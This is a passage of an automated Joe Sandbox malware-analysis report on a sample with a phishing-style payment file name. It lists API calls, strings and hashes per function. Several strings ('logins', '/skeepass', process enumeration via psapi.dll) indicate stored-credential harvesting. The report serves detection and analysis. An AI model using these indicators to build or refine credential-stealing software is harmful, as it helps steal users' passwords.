                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                          • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                          • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                                                                          • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                          • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
• Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
                                                                                                                                                                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                                                          • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
